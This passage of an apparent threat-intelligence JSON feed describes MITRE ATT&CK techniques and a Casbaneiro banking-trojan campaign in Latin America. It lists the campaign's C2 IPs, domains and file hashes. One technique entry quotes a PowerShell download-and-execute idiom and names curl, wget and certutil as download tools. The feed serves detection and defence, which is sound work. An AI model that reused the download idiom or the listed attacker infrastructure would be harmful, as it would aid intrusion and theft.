retrieve the local IPv4 address.(Citation: Trellix Rnasomhouse 2024)\n\nAdversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. ", "created_on": "2020-02-26T13:49:11.000Z", "name": "System Network Configuration Discovery"}, {"id": "9ce70935-2adc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", "created_on": "2020-11-20T03:00:57.000Z", "name": "Web Protocols"}, {"id": "3337cfef-4594-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to access the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW)\n\nIn addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013)", "created_on": "2020-12-24T03:00:38.000Z", "name": "Web Shell"}], "metrics": [{"date": "2026-09-09", "nodes": 1.09, "events": 9.21, "sectors": [{"sector": "Various", "affected": 3.54, "events": 29.84, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 2.67, "events": 30.49, "total": 1000000}, {"iso_code": "DE", "affected": 1.04, "events": 1.04, "total": 1000000}, {"iso_code": "LU", "affected": 26.71, "events": 26.71, "total": 1000000}, {"iso_code": "PL", "affected": 9.05, "events": 9.05, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-10", "nodes": 1.02, "events": 2.34, "sectors": [{"sector": "Unknown", "affected": 8.54, "events": 19.7, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 2.67, "events": 6.95, "total": 1000000}, {"iso_code": "PL", "affected": 18.09, "events": 27.14, "total": 1000000}, {"iso_code": "VE", "affected": 38.3, "events": 38.3, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-11", "nodes": 0.7, "events": 1.87, "sectors": [{"sector": "Unknown", "affected": 4.6, "events": 13.79, "total": 1000000}, {"sector": "Construction", "affected": 16.26, "events": 32.52, "total": 1000000}, {"sector": "Government", "affected": 0.41, "events": 0.41, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 1.6, "events": 5.08, "total": 1000000}, {"iso_code": "PL", "affected": 18.09, "events": 27.14, "total": 1000000}, {"iso_code": "TR", "affected": 4.8, "events": 9.6, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-12", "nodes": 1.02, "events": 3.75, "sectors": [{"sector": "Unknown", "affected": 2.63, "events": 12.48, "total": 1000000}, {"sector": "Banking/Financial/Wealth Management", "affected": 500000, "events": 1875000, "total": 1000000}, {"sector": "Government", "affected": 2.06, "events": 5.76, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 1.34, "events": 5.35, "total": 1000000}, {"iso_code": "TR", "affected": 33.61, "events": 129.63, "total": 1000000}, {"iso_code": "PL", "affected": 9.05, "events": 9.05, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-13", "nodes": 0.78, "events": 2.03, "sectors": [{"sector": "Various", "affected": 6.57, "events": 17.07, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 1.34, "events": 5.35, "total": 1000000}, {"iso_code": "TR", "affected": 14.4, "events": 19.2, "total": 1000000}, {"iso_code": "PL", "affected": 18.09, "events": 18.09, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-14", "nodes": 2.19, "events": 11.87, "sectors": [{"sector": "Unknown", "affected": 17.07, "events": 97.18, "total": 1000000}, {"sector": "Banking/Financial/Wealth Management", "affected": 125000, "events": 250000, "total": 1000000}, {"sector": "Government", "affected": 0.41, "events": 0.82, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 2.41, "events": 24.34, "total": 1000000}, {"iso_code": "HK", "affected": 43.08, "events": 137.86, "total": 1000000}, {"iso_code": "TH", "affected": 48.59, "events": 80.99, "total": 1000000}, {"iso_code": "TR", "affected": 19.2, "events": 43.21, "total": 1000000}, {"iso_code": "DE", "affected": 1.04, "events": 5.71, "total": 1000000}, {"iso_code": "KE", "affected": 207.19, "events": 932.35, "total": 1000000}, {"iso_code": "PL", "affected": 9.05, "events": 18.09, "total": 1000000}, {"iso_code": "SG", "affected": 6.44, "events": 32.22, "total": 1000000}, {"iso_code": "VE", "affected": 38.3, "events": 153.19, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-15", "nodes": 1.33, "events": 5.39, "sectors": [{"sector": "Various", "affected": 11.16, "events": 45.31, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 2.41, "events": 14.71, "total": 1000000}, {"iso_code": "DE", "affected": 1.56, "events": 3.11, "total": 1000000}, {"iso_code": "TR", "affected": 9.6, "events": 19.2, "total": 1000000}, {"iso_code": "BR", "affected": 5.6, "events": 8.4, "total": 1000000}, {"iso_code": "MY", "affected": 15.44, "events": 15.44, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-16", "nodes": 0.55, "events": 2.03, "sectors": [{"sector": "Various", "affected": 4.6, "events": 17.07, "total": 1000000}], "countries": [{"iso_code": "TR", "affected": 14.4, "events": 19.2, "total": 1000000}, {"iso_code": "US", "affected": 0.8, "events": 4.55, "total": 1000000}, {"iso_code": "AE", "affected": 22.42, "events": 112.1, "total": 1000000}], "countriesTotalDevices": 1000000}]}, {"id": "dd92a98a-cff3-4780-b12e-74e3e313e188", "threat_level_id": 2, "description": "In August 2026, FortiGuard Labs observed a Casbaneiro banking trojan campaign targeting users in Latin America through phishing emails and PDFs themed around fake invoices and legal notices. The malware employs geofencing to redirect non-targeted IP addresses to legitimate sites while delivering a multi-stage infection chain to victims in targeted regions including Argentina, Peru, Colombia, and Mexico. The attack uses an HTA downloader and AutoIt loader to inject the final payload into Windows processes. Casbaneiro collects email addresses and email metadata from Microsoft Outlook, transmitting unencrypted data to multiple exfiltration servers. The malware activates C2 communication only when victims access targeted banking websites, deliberately using HTTP 403 responses and distributed data-receiving servers to obscure network relationships and evade detection. The malware checks system language, excludes German, French, and English systems, and uses infection markers to prevent reinfection. Additional evasion techniques include malformed HTTP packets and split component downloads that reduce static detection likelihood.\r\n\r\nThe Trellix Threat Intelligence Group (TIG) gathers and analyzes information from multiple open and closed sources before disseminating intelligence reports. This campaign was researched by Fortinet and shared publicly https://www.fortinet.com/blog/threat-research/casbaneiro-a-banking-trojan-with-distributed-data-receiving-servers", "kb_article_link": null, "coverage": null, "external_analysis": {"links": ["https://www.fortinet.com/blog/threat-research/casbaneiro-a-banking-trojan-with-distributed-data-receiving-servers"]}, "is_coat": 0, "name": "Casbaneiro Banking Trojan Uses Distributed Servers To Evade Detection", "prevalence": {"countries": [{"iso_code": "US", "affected": 5.62, "events": 14.18, "total": 1000000}, {"iso_code": "CO", "affected": 9.98, "events": 19.96, "total": 1000000}, {"iso_code": "DE", "affected": 0.52, "events": 1.56, "total": 1000000}, {"iso_code": "EC", "affected": 51.24, "events": 153.71, "total": 1000000}], "events": 4.76, "nodes": 1.87, "sectors": [{"sector": "Various", "affected": 15.76, "events": 40.05, "total": 1000000}], "countriesTotalDevices": 1000000}, "iocs": [{"type": "ip", "value": "48.178.169.192"}, {"type": "ip", "value": "128.200.178.68"}, {"type": "ip", "value": "135.201.178.68"}, {"type": "ip", "value": "162.201.178.68"}, {"type": "ip", "value": "129.202.178.68"}, {"type": "ip", "value": "85.182.62.50"}, {"type": "ip", "value": "181.202.178.68"}, {"type": "ip", "value": "13.189.202.64"}, {"type": "ip", "value": "116.181.62.50"}, {"type": "ip", "value": "76.180.62.50"}, {"type": "ip", "value": "115.201.178.68"}, {"type": "ip", "value": "209.99.188.28"}, {"type": "ip", "value": "72.167.48.63"}, {"type": "domain", "value": "48.178.169.192.host.secureserver.net"}, {"type": "domain", "value": "116.181.62.50.host.secureserver.net"}, {"type": "domain", "value": "162.201.178.68.host.secureserver.net"}, {"type": "domain", "value": "135.201.178.68.host.secureserver.net"}, {"type": "domain", "value": "85.182.62.50.host.secureserver.net"}, {"type": "domain", "value": "gexwalltool.com"}, {"type": "domain", "value": "128.200.178.68.host.secureserver.net"}, {"type": "domain", "value": "181.202.178.68.host.secureserver.net"}, {"type": "domain", "value": "13.189.202.64.host.secureserver.net"}, {"type": "domain", "value": "115.201.178.68.host.secureserver.net"}, {"type": "domain", "value": "129.202.178.68.host.secureserver.net"}, {"type": "domain", "value": "x-wolverine.servebbs.com"}, {"type": "domain", "value": "76.180.62.50.host.secureserver.net"}, {"type": "mutex", "value": "GlobolID-4465173{Username}"}, {"type": "sha256", "value": "6bb4372d0d02ec87b76409f69d445a93910964f8db457bafafb97a011da59e73"}, {"type": "sha256", "value": "40d253480f752805e58c21266e40afe99afc96feea0d355732af5bea459db1dd"}, {"type": "sha256", "value": "bf92a287a3d79afb73a3f2d38877ec37c22a9f4a7d6ac2e0385472298f384fc8"}, {"type": "sha256", "value": "943d63ace373ee50d074daf84d357f8e5e62ff91c829d87f566bee453d715280"}, {"type": "sha256", "value": "711c0aa8cde078aa349fb329e3e44e4272ea66a5e651ad8a64893c76a725c859"}, {"type": "sha256", "value": "d910e08a11a4f6f764e7495f4602a00b6024ca6e1b70fe30ba3752b881574365"}, {"type": "sha256", "value": "47d321c1a232e5cdd1e39a06dadbd79114dc1a2f0f8eac289e6b653a5d126f95"}, {"type": "sha256", "value": "d13ad6fc5fda54e65f1214e554a5123126ac7b3ce6db57566ed7bd0e92d03d85"}, {"type": "sha256", "value": "d04f68079ca90c65223a907f23fae5d068904a2145348b953b1d06e2eaf0bf2c"}, {"type": "sha256", "value": "1b4d5c95f4fc037ca3c359cea5ca2da1285bbadab12bcdcb47f3dad8bc6fa8ed"}, {"type": "sha256", "value": "62ef39ec29966d71c8254f68bd5e320cf24a042d76c12dbafdcc0766861827c5"}, {"type": "sha256", "value": "1f1a89bef73e4866a198a08e750f96348ce2b82816a8353e9a8a574bfde5f491"}, {"type": "sha256", "value": "ea8af591fe2d605c82bb7831d2ebdfb17cb2659880e1a8a7b0a2dd851dc5e7a3"}, {"type": "sha256", "value": "0b4d962eef2d06abfe08a8cd0b15edd224d4fae0b57d708aebd77d99667616d5"}, {"type": "md5", "value": "d3d257a3066fcdc370534989705e2010"}, {"type": "sha1", "value": "9807286640d14132d92c6b320f9c73a40515d8b6"}, {"type": "sha256", "value": "c521b3a189b0089a2558aa4e42bd9fb5558e1b17917e2e183a4bd9cbcb2ed77e"}, {"type": "md5", "value": "6b9caf90cca5f25011508c7fa6f55bb0"}, {"type": "sha1", "value": "9e71e2e12b50e46c79d81f0b2691c46dbd683d62"}, {"type": "sha256", "value": "0849a6b87fbef25089ad0be746f84047b080ba81898a8614da43d4ab60ef735a"}, {"type": "sha256", "value": "4302586202234cdf1ca058fd3c62be0050c8155ed113f3f62337d756e6915044"}, {"type": "sha256", "value": "85767416f8d1e73833ccaa193263d1198857308b3a1185e6f4ebc4164db8584f"}, {"type": "sha256", "value": "f1aa14ebfd2da477edba94b34f09f775485688b5958d82fcb072a837e27e246b"}, {"type": "sha256", "value": "c477bdfae91e3df9be29e9eeba785467aff294f5250c2eed406765032cb68756"}, {"type": "sha256", "value": "6e6bd2f7566ffa52d52fa9d5f048bbb9246d3d50110c6b0c248919ad796c6fd4"}, {"type": "sha256", "value": "4540c3af3b1d8c52256f4580dd4d002fadb8c5ff4e32e6a41fdf508455c5b697"}, {"type": "sha256", "value": "92a1428e125f33de012c7f52fb0827be3d7e90e38a0e38083181f8c3312adc9c"}, {"type": "sha256", "value": "e57409c5e1f8287900c1c3b3e8c099cef537a02949315eb768c88906b0c65add"}, {"type": "sha256", "value": "5a76669ec410d0b3e21112a4a6fd3207976b299ee27c5fc3d42f2673170ab95e"}, {"type": "sha256", "value": "8092b9de455463296898fcaf8c9955d1c00dae6812c03bba019edf9c059ece33"}, {"type": "sha256", "value": "99fcabf7c996d6ec077ccd745a158a3a395403d6a3df9d8da179f3cd5faf81b1"}, {"type": "sha256", "value": "875e8d4137e1016b4be869e36e00a9414e89902fd5592a2fb881ebb0e4bd2f8b"}, {"type": "sha256", "value": "bd724bbb27f9a71fd44f1c334b003541761071655fa585b64eed3bd78fc28e01"}, {"type": "sha256", "value": "a42daeca71a6bdc79fd66b8b6ee413562abf7f72ef093292c86c1e9e7c2be456"}, {"type": "sha256", "value": "7e04e86c07213fed7bebccd9953818b102b1b25b78e5f3707e81bad5054cf4e8"}, {"type": "sha256", "value": "6547736c31dabb5bef2a290b32a72bf63b5c42dd2a33b5a6520159b41c43b093"}, {"type": "sha256", "value": "51503ce1373c7fa72a1da5c5c4b30f88c8224686669ba4b64196591414fdc64c"}, {"type": "sha256", "value": "5b3c2442831d4844ea6b86942f1a0ba27170018382cbc362343db63717d0ff02"}, {"type": "sha256", "value": "71dea06c2271a46fc2fd6092e2ba0c2f5a2cf5ca8f955ee3375e3ca66a5dc52b"}, {"type": "sha256", "value": "fc820eeb054c781693eca78fed1c418f12b27da2c7c7e73281eb07b25cc7d910"}, {"type": "sha256", "value": "f76d09cbd455ce18765591b9efa3bde0d31358b6321f7a10fc2e04f65d7407ba"}, {"type": "sha256", "value": "7de637539159dc17ceedb0aae783930ee68639b6d8036ef8147027c5ebca3fc8"}, {"type": "md5", "value": "e486368f3bee79e23f8a0fd1da47b54f"}, {"type": "sha1", "value": "bbf9e8172555da9c04fc30f74ad2a7ac7c389c2d"}, {"type": "sha256", "value": "eaec8c6950f394ad5dcd271aa86f08cb2b8374203ecc67015af7ca6057244390"}, {"type": "md5", "value": "927e02826f4a3caa05b82f080fd9a012"}, {"type": "sha1", "value": "82a71c15d84aa843588fdb2fe755a38e6c83a762"}, {"type": "sha256", "value": "be5a110ee72ebcf1b7d9e155308a8abc606bd446f8aec1a9f33cd06ca0f3c056"}, {"type": "md5", "value": "1372d89ea49c32884b01437c89f090ae"}, {"type": "sha1", "value": "8f8377899b901dd082c5ec014d15dbdf24cae21a"}, {"type": "sha256", "value": "debe871710268e7bb770b72c6772f2e0b8bd40a22b2eabf4b6556eaba2d71057"}, {"type": "md5", "value": "bdf750c4b60a171b7f3281c66683722f"}, {"type": "sha1", "value": "2a31f969ab6facc81abac41a8563138f983e2348"}, {"type": "sha256", "value": "dc62e645589463a61e6ac562d034a9de4ed897714389eb6b87bb02f0bd59d565"}, {"type": "md5", "value": "8ebc61a719ba6a0532344db46a50fddb"}, {"type": "sha1", "value": "acbc01a258888016d46cac6e396210e898ee706d"}, {"type": "sha256", "value": "995b1156562150c15970aa2d6b27f0b442d758594d820ec09d53d5e861fac457"}, {"type": "md5", "value": "cf259e5ee7e9483d38a2313ca897ba33"}, {"type": "sha1", "value": "63f8b505d46c27ffed6a97d027fa656e07424698"}, {"type": "sha256", "value": "918dd413cceed3b8aeaa79e45d9d7b2030d73e2affa4339b8f9d043d08844f62"}], "galaxies": [{"id": "7526c87b-4492-4026-a4ae-ea333c8e445c", "category": "trellix-tool", "description": "The .NET Services Installation tool performs the following actions:\r\n\r\nLoads and registers an assembly.\r\nGenerates, registers, and installs a type library into a specified COM+ application.\r\nConfigures services that you have added programmatically to your class.\r\n\r\nSource: Microsoft", "created_on": "2022-11-11T11:53:08.000Z", "name": ".NET Services Installation Tool"}, {"id": "4e6a9eb7-5893-4c78-a7fa-55e5011421e7", "category": "country", "description": "Argentina", "created_on": "2022-04-05T21:15:08.000Z", "name": "argentina"}, {"id": "6070f604-8836-4097-bfe1-1d1280d70e65", "category": "mitre-attack-pattern", "description": "Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)\n\nAdversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)\n\nThese scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)", "created_on": "2024-07-05T21:15:30.000Z", "name": "AutoHotKey & AutoIT"}, {"id": "e2e7975b-d1f0-4d0d-ba5c-6e40cf204795", "category": "trellix-tool", "description": "AutoIt is a freeware scripting language designed for automating tasks within the Microsoft Windows graphical user interface. It utilizes a simple, BASIC-like syntax to simulate user actions such as keystrokes, mouse movements, and window control manipulation. This allows it to interact with and automate applications where no other automation mechanism is available. Scripts can be compiled into standalone executable files that can run on other Windows computers without needing the AutoIt interpreter, making it a powerful tool for system administration, software installation, and application testing.", "created_on": "2022-01-06T06:13:27.000Z", "name": "AutoIT"}, {"id": "a26e83e0-a46b-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-06-02T00:54:38.000Z", "name": "Bank"}, {"id": "a9574290-6f7e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications. \n\nFor example, on Windows adversaries can access clipboard data by using <code>clip.exe</code> or <code>Get-Clipboard</code>.(Citation: MSDN Clipboard)(Citation: clip_win_server)(Citation: CISA_AA21_200B) Additionally, adversaries may monitor then replace users\u2019 clipboard with their data (e.g., [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002)).(Citation: mining_ruby_reversinglabs)\n\nmacOS and Linux also have commands, such as <code>pbpaste</code>, to grab clipboard contents.(Citation: Operating with EmPyre)", "created_on": "2020-03-26T16:27:18.000Z", "name": "Clipboard Data"}, {"id": "8aba4514-3d5c-46a8-ae2e-3f26645c2a1c", "category": "country", "description": "Colombia", "created_on": "2022-04-05T21:15:08.000Z", "name": "colombia"}, {"id": "f5963caa-8168-41ed-b74d-1cfd0e119418", "category": "mitre-attack-pattern", "description": "Adversaries may use compression to obfuscate their payloads or files. Compressed file formats such as ZIP, gzip, 7z, and RAR can compress and archive multiple files together to make it easier and faster to transfer files. In addition to compressing files, adversaries may also compress shellcode directly - for example, in order to store it in a Windows Registry key (i.e., [Fileless Storage](https://attack.mitre.org/techniques/T1027/011)).(Citation: Trustwave Pillowmint June 2020)\n\nIn order to further evade detection, adversaries may combine multiple ZIP files into one archive. This process of concatenation creates an archive that appears to be a single archive but in fact contains the central directories of the embedded archives. Some ZIP readers, such as 7zip, may not be able to identify concatenated ZIP files and miss the presence of the malicious payload.(Citation: Perception Point)\n\nFile archives may be sent as one [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) through email. Adversaries have sent malicious payloads as archived files to encourage the user to interact with and extract the malicious payload onto their system (i.e., [Malicious File](https://attack.mitre.org/techniques/T1204/002)).(Citation: NTT Security Flagpro new December 2021) However, some file compression tools, such as 7zip, can be used to produce self-extracting archives. Adversaries may send self-extracting archives to hide the functionality of their payload and launch it without requiring multiple actions from the user.(Citation: The Hacker News)\n\n[Compression](https://attack.mitre.org/techniques/T1027/015) may be used in combination with [Encrypted/Encoded File](https://attack.mitre.org/techniques/T1027/013) where compressed files are encrypted and password-protected.", "created_on": "2025-07-30T16:14:31.000Z", "name": "Compression"}, {"id": "c3dcf574-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\n\nOne such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows <code>copy /b</code> or <code>type</code> command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)(Citation: Sentinel One Tainted Love 2023)\n\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.(Citation: Volexity PowerDuke November 2016)", "created_on": "2020-02-26T13:49:10.000Z", "name": "Deobfuscate/Decode Files or Information"}, {"id": "aeddd759-fd26-4ad5-9a59-356196e62972", "category": "mitre-attack-pattern", "description": "Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use.\n\nThis type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding schemes such as Base64.\n\nThe entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection.\n\nFor example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File) \n\nAdversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution.", "created_on": "2024-05-23T21:13:59.000Z", "name": "Encrypted/Encoded File"}, {"id": "c4976d05-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.", "created_on": "2020-02-26T13:49:11.000Z", "name": "Exfiltration Over C2 Channel"}, {"id": "4532b1ca-6916-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-03-18T12:44:55.000Z", "name": "Finance"}, {"id": "92ed9a08-7d3c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).\n\nAdversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs)\n\nAdversaries may also mimic common software authentication requests, such as those from browsers or email clients. This may also be paired with user activity monitoring (i.e., [Browser Information Discovery](https://attack.mitre.org/techniques/T1217) and/or [Application Window Discovery](https://attack.mitre.org/techniques/T1010)) to spoof prompts when users are naturally accessing sensitive sites/data.", "created_on": "2021-03-04T22:54:28.000Z", "name": "GUI Input Capture"}, {"id": "c4685e8c-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). \n\nOn Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)  A number of these tools, such as `wget`, `curl`, and `scp`, also exist on ESXi. After downloading a file, a threat actor may attempt to verify its integrity by checking its hash value (e.g., via `certutil -hashfile`).(Citation: Google Cloud Threat Intelligence COSCMICENERGY 2023)\n\nAdversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms)\n\nFiles can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)", "created_on": "2020-02-26T13:49:11.000Z", "name": "Ingress Tool Transfer"}, {"id": "db3f5146-6e39-4108-87fa-3e932f52e84d", "category": "trellix-tool", "description": "JavaScript, often abbreviated as JS, is a programming language that conforms to the ECMAScript specification. JavaScript is high-level, often just-in-time compiled and multi-paradigm. It has dynamic typing, prototype-based object-orientation and first-class functions.\r\n\r\nJavaScript is used for web development, in web applications, for game development, and much more. It allows you to implement dynamic features on web pages that cannot be done with only HTML and CSS. Many browsers use JavaScript as a scripting language for doing dynamic things on the web. Any time you see a click-to-show dropdown menu, extra content added to a page, and dynamically changing element colours on a page, to name a few features, you're seeing the effects of JavaScript.\r\n\r\nExploiting JavaScript in cyber attacks is not exactly new, but the increasing frequency of this attack vector is. Even in 2020, JavaScript-based attacks are still a matter of great concern. The danger in these attacks lies in one key aspect: malware delivered via infected JavaScript files doesn\u2019t need user interaction. Better said, a user could get infected with malware without doing anything else than browsing a website. JavaScript is not an insecure programming language, code bugs or improper implementations can create backdoors which attackers can exploit.", "created_on": "2021-11-24T06:14:13.000Z", "name": "JavaScript"}, {"id": "2a2c9204-3e03-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)\n\nJScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)\n\nJavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple\u2019s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple\u2019s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple\u2019s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility <code>osascript</code>, they can be compiled into applications or script files via <code>osacompile</code>, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)\n\nAdversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).", "created_on": "2020-12-14T11:54:47.000Z", "name": "JavaScript"}, {"id": "2a156d6e-3575-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems.(Citation: Talos Kimsuky Nov 2021)\n\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.\n* Reading 